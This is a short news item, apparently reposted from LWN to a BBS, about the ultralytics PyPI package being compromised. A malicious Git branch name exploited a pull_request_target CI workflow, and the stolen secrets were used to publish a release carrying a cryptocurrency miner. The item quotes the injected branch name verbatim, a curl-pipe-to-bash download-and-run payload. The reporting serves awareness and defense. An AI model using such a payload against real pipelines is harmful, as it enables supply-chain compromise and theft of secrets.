Abusing Git branch names to compromise a PyPI package

Date:
Fri, 06 Dec 2024 18:44:12 +0000

Description:
A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script.
The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong ) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4 f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)
Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script. This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.

======================================================================
Link to news story:
https://lwn.net/Articles/1001215/


--- Mystic BBS v1.12 A47 (Linux/64)
* Origin: tqwNet UK HUB @ hub.uk.erb.pw (1337:1/100)